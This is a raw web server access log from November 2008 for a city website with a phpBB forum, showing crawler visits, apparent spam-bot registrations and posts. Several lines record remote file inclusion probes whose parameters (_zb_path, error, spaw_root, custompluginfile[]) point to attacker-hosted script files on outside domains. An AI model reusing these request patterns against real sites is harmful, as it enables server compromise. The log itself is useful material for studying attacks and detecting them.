82.99.30.33 - - [15/Nov/2008:05:13:57 -0800] "GET /jodera2/index.php?sid=93139a539e76f2849188947028b44da8 HTTP/1.0" 200 61726 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:13:59 -0800] "GET /logs/access_081002.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 404 744 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:13:59 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 44225 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:13:59 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 73571 "-" "Mozilla/5.0" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:14:34 -0800] "GET /listings/listing/results.php?category_id=750 HTTP/1.0" 200 24432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:14:41 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 11605080 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:14:48 -0800] "GET /logs/access_081002.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 404 744 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:14:48 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 44225 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:14:49 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 73571 "-" "Mozilla/5.0" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:51 -0800] "GET /jodera2/viewtopic.php?t=32675&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 84638 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:52 -0800] "GET /jodera2/viewtopic.php?p=42447&sid=6b695e6094e33be444de52267287ea08 HTTP/1.1" 200 83193 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:14:52 -0800] "GET /logs/access_080927.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:52 -0800] "GET /jodera2/profile.php?mode=register&sid=444f2b6b9eeaf27ddb898f25a909fa22 HTTP/1.1" 200 15283 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:53 -0800] "GET /jodera2/profile.php?mode=register&sid=65d59b6c258bccfff154519f51dd325c HTTP/1.1" 200 15283 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:54 -0800] "GET /jodera2/groupcp.php?sid=79ae10d187d6180941a7f2285bbf0d94 HTTP/1.1" 200 17512 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:57 -0800] "GET /jodera2/memberlist.php?mode=joined&order=ASC&start=2000&sid=33bfc481b67eb5b6e0455e78aa86a029 HTTP/1.1" 200 97066 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:14:58 -0800] "GET /jodera2/profile.php?mode=viewprofile&u=8&sid=33bfc481b67eb5b6e0455e78aa86a029 HTTP/1.1" 200 21902 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:15:00 -0800] "GET /jodera2/viewtopic.php?t=30461&view=next&sid=65d59b6c258bccfff154519f51dd325c HTTP/1.1" 200 84206 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:15:29 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:15:29 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
195.98.246.153 - - [15/Nov/2008:05:15:29 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.65" "www.sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:05:15:35 -0800] "GET /picgallery/displayimage.php?album=10&pos=1 HTTP/1.1" 200 9933 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
82.99.30.46 - - [15/Nov/2008:05:16:53 -0800] "GET /jodera2/faq.php?sid=93139a539e76f2849188947028b44da8 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:16:53 -0800] "GET /jodera2/index.php HTTP/1.0" 200 61726 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:00 -0800] "GET /jodera2/viewforum.php?f=1&sid=553f519e3d0aa2b171f80e6387a1924c HTTP/1.0" 500 292 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:17:01 -0800] "GET /jodera2/posting.php?mode=reply&t=32689 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32689" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 Mnenhy/0.6.0.103" "www.sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:17:03 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 Mnenhy/0.6.0.103" "www.sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:17:14 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 Mnenhy/0.6.0.103" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:14 -0800] "GET /jodera2/viewforum.php?f=1&sid=553f519e3d0aa2b171f80e6387a1924c HTTP/1.0" 200 85349 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:17:15 -0800] "GET /jodera2/posting.php?mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a HTTP/1.0" 200 50510 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 Mnenhy/0.6.0.103" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:17 -0800] "GET /jodera2/profile.php?mode=register HTTP/1.0" 200 14310 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:18 -0800] "GET /jodera2/profile.php?mode=register&agreed=true HTTP/1.0" 200 30036 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:21 -0800] "POST /jodera2/profile.php HTTP/1.0" 200 32044 "http://sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
195.113.173.139 - - [15/Nov/2008:05:17:23 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:23 -0800] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:17:25 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://sancarloscity.org/jodera2/login.php" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:18:08 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32689&sid=b9ebbe2677d006c3dbe6edec4cdcf89a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8 Mnenhy/0.6.0.103" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:08 -0800] "GET /jodera2/index.php HTTP/1.0" 200 61831 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:18:08 -0800] "GET /jodera2/index.php?sid=553f519e3d0aa2b171f80e6387a1924c HTTP/1.0" 200 55160 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:18:10 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41362 "-" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:18:21 -0800] "GET /jodera2/posting.php?mode=reply&t=32688 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32688" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050512 Netscape/8.0" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:18:23 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050512 Netscape/8.0" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:18:30 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050512 Netscape/8.0" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:30 -0800] "GET /jodera2/viewforum.php?f=1&sid=1452d8d6f70411bdf4db7150f4b4b196 HTTP/1.0" 200 85349 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:18:31 -0800] "GET /jodera2/posting.php?mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668 HTTP/1.0" 200 50588 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050512 Netscape/8.0" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:33 -0800] "GET /jodera2/profile.php?mode=register HTTP/1.0" 200 14310 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:37 -0800] "GET /jodera2/profile.php?mode=register&agreed=true HTTP/1.0" 200 30036 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:42 -0800] "POST /jodera2/profile.php HTTP/1.0" 200 32066 "http://sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:45 -0800] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:18:49 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://sancarloscity.org/jodera2/login.php" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:19:00 -0800] "GET /jodera2/index.php?sid=1452d8d6f70411bdf4db7150f4b4b196 HTTP/1.0" 200 11540 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:19:00 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 18401 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32688&sid=dd8c6b01d6e7aac1f50d97a5d922f668" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20050512 Netscape/8.0" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:05:19:00 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 16881 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:19:03 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 105 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:19:04 -0800] "GET /jodera2/viewforum.php?f=2&sid=1452d8d6f70411bdf4db7150f4b4b196 HTTP/1.0" 200 105 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:19:05 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41362 "-" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:19:52 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 44225 "-" "Mozilla/5.0" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:19:53 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 200 73598 "-" "Mozilla/5.0" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:19:54 -0800] "GET /logs/access_081002.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 760 "-" "Mozilla/5.0" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:20:08 -0800] "GET /logs/access_080927.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:20:20 -0800] "GET /logs/access_080927.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
222.236.47.182 - - [15/Nov/2008:05:20:23 -0800] "GET /logs/access_080927.log//skin/zero_vote/ask_password.php?dir=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 791 "-" "Mozilla/5.0" "www.sancarloscity.org"
82.99.30.28 - - [15/Nov/2008:05:20:27 -0800] "GET /jodera2/index.php?sid=bd84e735ba8efa1b6c5a6c819e10c870 HTTP/1.0" 200 61936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:05:20:40 -0800] "POST /jodera2/posting.php HTTP/1.0" 500 292 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Opera/9.0 (Windows NT 5.1; U; en)" "sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:46 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:46 -0800] "GET /?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:47 -0800] "GET /logs//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:51 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:20:52 -0800] "GET /listings/listing/results.php?letter=b&category_id=750 HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:54 -0800] "GET /logs/access_081021.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:55 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:20:55 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 764 "-" "libwww-perl/5.805" "www.sancarloscity.org"
65.55.37.234 - - [15/Nov/2008:05:20:56 -0800] "GET /jodera2/viewtopic.php?p=144&sid=81e015bfa18f1f0c1845aa751b724c9a HTTP/1.1" 302 5 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:21:16 -0800] "GET /logs/access_081021.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:21:16 -0800] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:21:17 -0800] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 764 "-" "libwww-perl/5.805" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:05:21:41 -0800] "GET /picgallery/displayimage.php?album=31&pos=5 HTTP/1.0" 200 10000 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:05:21:58 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:05:22:01 -0800] "GET /jodera2/posting.php?mode=reply&t=32690 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32690" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:05:22:01 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:05:22:06 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:05:22:08 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:05:22:11 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:05:22:12 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:05:22:17 -0800] "GET /jodera2/posting.php?mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa HTTP/1.0" 200 50639 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:26 -0800] "GET /logs/access_081024.log//admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 793 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:27 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:27 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 775 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:30 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:31 -0800] "GET /?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:32 -0800] "GET /logs//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:35 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
82.99.30.66 - - [15/Nov/2008:05:22:40 -0800] "GET /jodera2/faq.php?sid=bd84e735ba8efa1b6c5a6c819e10c870 HTTP/1.0" 200 68232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:40 -0800] "GET /logs/access_081024.log//admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 793 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:41 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:22:41 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 775 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:05:22:48 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11256 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32690&sid=a9005ff95c2ce31e606212975d7eeffa" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:23:33 -0800] "GET /jodera2/posting.php?mode=reply&t=30755 HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:05:23:36 -0800] "GET /index1.htm HTTP/1.0" 200 21792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:23:46 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=30755&sid=3d1b624619d71c0e85da19cb38847121 HTTP/1.0" 200 12363 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:05:23:56 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 - "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=633764c585266a476c8b0b693402d29e" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:24:05 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=30755&sid=3d1b624619d71c0e85da19cb38847121" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:24:13 -0800] "GET /logs/access_081014.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.20.138.101 - - [15/Nov/2008:05:24:18 -0800] "GET /logs/access_081014.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
78.157.143.211 - - [15/Nov/2008:05:24:26 -0800] "GET /jodera2/posting.php?mode=reply&t=30755&sid=3d1b624619d71c0e85da19cb38847121 HTTP/1.0" 200 743774 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:24:58 -0800] "GET /?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 44225 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:24:58 -0800] "GET /logs/access_081002.log//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 404 744 "-" "Mozilla/5.0" "www.sancarloscity.org"
210.222.26.66 - - [15/Nov/2008:05:24:58 -0800] "GET /logs//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.0" 200 73571 "-" "Mozilla/5.0" "www.sancarloscity.org"
